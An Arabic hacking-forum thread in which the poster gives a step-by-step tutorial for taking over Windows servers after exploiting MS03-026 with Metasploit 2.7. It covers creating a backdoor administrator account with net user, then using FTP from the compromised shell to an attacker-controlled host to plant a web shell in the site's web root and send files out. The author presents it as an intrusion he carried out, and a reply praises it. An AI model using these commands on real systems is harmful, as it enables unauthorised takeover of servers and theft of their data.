التنين الاسود
Admin
الدوله/البلد : 
عدد المساهمات : 85
نقاط : 10450
السٌّمعَة : 0
تاريخ الميلاد : 19/05/1991
تاريخ التسجيل : 15/05/2010
العمر : 32
 | | موضوع: شرح التحكم الكامل في سرفرات الويندوز من الميتا سبلويت بعد الاتصال العكسي بالسرفر الخميس يوليو 29, 2010 4:59 pm | |
| [tr][td class=hr colspan="2"][/td][/tr][tr][td colspan="2"] 
ابدا موضوعي باسم الله الرحمن الرحيم واصلي واسلم علي اشرف الخلق اجمعين
سيدنا محمد النبي الامي ومن اتبعه باخلاص الي يوم الدين . أما بعد .
===================================
M e t a Sploit Project
هذا الاسم الذي لطالما مر علي الكثيرين ممن يتصفحون الانترنت سواء في مجال
القرصنه او غيره
ما هو مشروع
الميتا
سبلويت وفيما يستخدم ؟؟
بدأ مشروع ثغرات M e t a sploit في عام 2003 تقريبا
بالطبع وكما هو معروف ان اي مشروع او اداه يتم طرحها علي الشبكه العنكبوتيه
تكون سلاح ذو حدين وكل شخص يستخدمها علي حسب رؤيته وعقليته
فاداة [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]يمكن استخدامها في مجال الحمايه وكذا في مجال الاختراق
اما في مجال الاختراق فان الثغرات المطروحه في مشروع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]يتم
بها اختراق السرفرات
او اجهزة الحواسيب الالكترونيه او يتم بها مهاجمة انظمة التشغيل ومتصفحات
الانترنت
واما الحمايه فمن الماكد ان ارباب البرامج التي تم طرح ثغراتها في البرنامج
لن يقفو مكتوفي الايدي
فطالما عرفت الثغره فبالاكيد عرف الترقيع وهذا يضمن لهم امان اكثر
لمشاريعهم الي ان يتم اكتشاف ثغره اخري ربما تهدد نظامهم الأمني
حسنا ما هي أخطر ثغرات هذا المشروع ؟
لا شك في ان اي ثغره تم طرحها في مشروع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]هي
ثغرة بمثابة 0-day يعني ثغره قاتله
ولاكن اخطر الثغرات التي مرت بمشروع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]كانت
ثغرة msrpc_dcom_ms03_026
وكان أحد أخطر استخداماتها هو في انشاء مستخدم جديد علي السرفر يملك نفس
صلاحية مدير النظام
والتي راح ضحيتها عشرات وربما مئات السرفرات الحكوميه في انحاء العالم وكان
لجمهورية الصين نصيب الاسد في المواقع الحكوميه التي تم الاطاحه بها
فاذكر انا ما يقرب من 91% من المواقع الحكوميه الصينيه تعمل علي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]ويندوز
وما يقرب من نسبة 78% من المواقع الحكوميه في العالم يعمل علي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]ويندوز وهذا الكلام عن تجربه شخصيه واحصائيه ليست بالتخمينيه ,
ولاكن الاصدارات المصابه بهذه الثغره كانت IIS4 , IIS5
اما الاصدار السادس وما بعده فلا تعمل عليهم الثغره علي حسب ذكر المصدر من
شركة ميكروفت
وعلي حسب اعتقادي فان اول من كان يستخدم تلك الثغره هم الفريق الامريكي
PoisonBox
وهذا الكلام علي حسب ذكر الهكرز الصينين في الحرب الالكترونيه التي تمت بين
الدولتين في عام 2001
اوووف اعذروني فلدي الكثير لاقوله في هذا المجال ولاكني لا احب ان اطيل
اكثر من ذلك وسابدا بالسرد باذن الله
بالنسبه لثغرة msrpc_dcom_ms03_026 فمنذ ان تم طرحها فما من شخص قام بشرحها
الا قام بشرح كيفية استخدامها في انشاء حساب جديد علي السرفر بصلاحيات
المدير
ومن شرح استخدامها في [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]لم
يقم سوي بالتصال بالدوس ويقول اكملو انتم ؟؟
ولاكن ماذا بعد
الاتصال بموجه الاوامر الخاص [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]؟؟
هذا هو موضوع اليوم باذن الله لكي يكون هذا الموضوع مختصر عن [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]الاصدار الثاني
والموضوع القادم سيكون عن الاصدار الثالث وساطرح ثغرات خاصه باذن الله
حسنا رابط تحميل الاداه الاصدار 2.7 :
كود PHP:
http://file12.9q9q.net/Download/15152612/framework-2.7.rar.html
طبعا حتي لا يطول الموضوع فقد تم شرح الاداه اكثر من مره وتم شرح
استخدامها
حسنا بعد تثبيت الاداه وفتح الـ MsConsol تفعل الآتي :
طبعا الأمر واضح فهو لاستخدام ثغرة msrpc_dcom :
كود PHP:
use msrpc_dcom_ms03_026
طبعا الثغره تم شرحها من قبل كثيرا جدا جداوانا مش بحب احكي في
المحكي وحفاظا علي قوانين المنتدي مش هكتب روابط للموضوع بس تقدرو تبحثو
عنو في جوجل ,
المهم ندخل في الاساس بعد ما طبقت الثغره واتصلت عكسي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]واصبح موجه الأوامر الخاص بالجهاز مفتوح اموالدتك فماذا تفعل ؟
(( ملحوظه موجه الاوامر هو الدوس (doc) وهي اختصار (disk operating system)
وطبعا نفس الاسم معروفه به ثغرات الدوس doc ولاكن هذه الثانيه تعني
(denial of service) والتي تعني حجب الخدمه )
حسنا نعود الي الموضوع الرئيسي وهذه صورة من الدوس الخاص بالجهاز الذي قمت
بالاتصال
العكسي به وهو سرفر هولندي علي كل حال :
بالفعل كما تلمحون في الصورة بالاعلي فان الذي طبقت منه الاوامر هو :
كود PHP:
C : D o c u m e n t s and Settings hima
ولاكن هذا طبعا لا يعني انني اطبق علي جهازي الشخصي وهذا واضح من نفس
الصورة فقط كل ما في الامر انني قمت بعمل اشرح بعدما قمت بترويت السرفر
واليوزر هو اسمي وليس هناك غرابه في ذلك ... ,
الآن ماذا تفعل بعدما قمت بالاتصال [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]؟؟
فلنفرض انك تريد ترويت السرفر ؟؟ بسيطه تقوم بتطبيق الأمر :
كود PHP:
net user virus_hima paswd /add
طبعا تستبدل virus_hima باليوزر الذي تختاره و paswd بالباسورد الذي
تريده
ثم :
كود PHP:
net localgroup administrators virus_hima /add
الآن قمت بأضافة اليوزر الي قآئمة المديرين للنظام وأصبحت تملك
الصلاحيه للتحكم
الكامل
بالسرفر 
والآن تستطيع الإتصال [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]عن
طريق الريموت ديسك توب ويصبح الجهاز تحت تحكمك
ولاكن لنكن واقعيين أكثر فمعظم السرفرات يحجب تنفيذ الأمر net user وأتباعه
من
كود PHP:
net user usr pwd /add >> etc
فهل نترك السرفر ونخرج ؟ بالطبع لا ,
فلنفرض انك تريد رفع شل علي جهاز السرفر لتتحكم في مواقعه مثلا طالما طاحت
مننا حيلتنا الاولي
فالأمر بسيط بإذن الله . .
في البدايه لابد يكون معاك سي بنل بتاع اي موقع حتي اذا مساحه مجانيه مش
مشكله المهم يكون معاك بيانات الاف تي بي لماذا ؟
لاننا سنقوم بالاتصال بالـ ftp الخاص بمساحتنا عن طريق الدوس  وسحب ملف الشل الي مسار الموقع علي السرفر
ومن ثم استعراضه من المتصفح والتمتع بالإختراق .
في البدآيه نقوم بالتنقل الي المسار الموجود به المواقع علي السرفر طبعا
التنقل يكون عن طريق الأمر
كود PHP:
cd
واستعراض الملفات يكون عن طريق الأمر :
كود PHP:
dir
ولا تنسي انك تستخدم الدوس يعني في [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]مش
لينوكس بيكون :
كود PHP:
cd & ls -la
حسنا بالنسبه لي فالمسار هاهنا :
كود PHP:
C: Inetpub wwwroot
حسنا الآن نكتب الأمر :
كود PHP:
ftp open
وستون النتيجه :
كود PHP:
C:D o c u m e n t s and Settings hima>ftp open
Unknown host open.
ftp>
ثــــــــــــــــــــم :
كما تشاهدون في الصوة بالاعلي نكتب الأمر :
كود PHP:
open vhima.110mb.com
ثم سيطلب منك اليوزر وبعدها الباسورد والان انت متصل بالسي بنل الخاص
بك من الدوس
والان من الاف تي بي ترفع شل علي مساحتك الخاصه ثم تقوم بسحبه علي السرفر
في المسار
الذي حددته في البدايه والذي يحوي موقع السرفر ثم تشغله من المتصفح ,, تآبع
:
الآن تم والحمد لله سحب الشل علي السرفر وتسطيع استدعائه من المتصفح وتفعل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]ما
تشاء باذن الله
طبعا لا احد يقولي ممكن نخترق الاجهزه اللي تحت الشبكه والكلام ده لانه
معروف في اجهزه السرفر بيكون الايبي الخاص بها اي بي ستاتيك يعني ثابت
مش معقول بيكون جهاز سرفر بيشيل مواقع وهيروح ياجر وصلة نت من واحد جنبهم
:p
طبعا بالنسبه للسحب والارسال فاذا اردت سحب ملف من موقعك الي جهاز السرفر
تستخدم الأمر :
كود PHP:
get file.whatever
كما هو واضح في الصورة بالاعلي , اما اذا اردت ارسال ملف من جهاز
السرفر الي الافتبي الخاص بك
لسحبه علي جهازك مثلا فتستخدم الأمر :
كود PHP:
send file.whatever
طبعا whatever هي الإمتداد >> e.g >> txt,exe,gif
وطبعا نفس الطريقه لها استخدامات اخري ولاكن اترككم تتعاملون معها كل علي
هواه :p
والآن تم الشرح بحمد الله وأتمني ان يكون شرحا كافيا وافيا من الاخطاء
خاليا . . .[/td][/tr] | |
|
علاء
المدير العام
الدوله/البلد :
عدد المساهمات : 1282
نقاط : 12372
السٌّمعَة : 18
تاريخ الميلاد : 23/10/1990
تاريخ التسجيل : 02/02/2010
العمر : 33
الموقع : https://amirelhop.yoo7.com
| | موضوع: رد: شرح التحكم الكامل في سرفرات الويندوز من الميتا سبلويت بعد الاتصال العكسي بالسرفر الخميس يوليو 29, 2010 5:00 pm | |
| كتير جميل الشرح تسلم ايدك | |
|
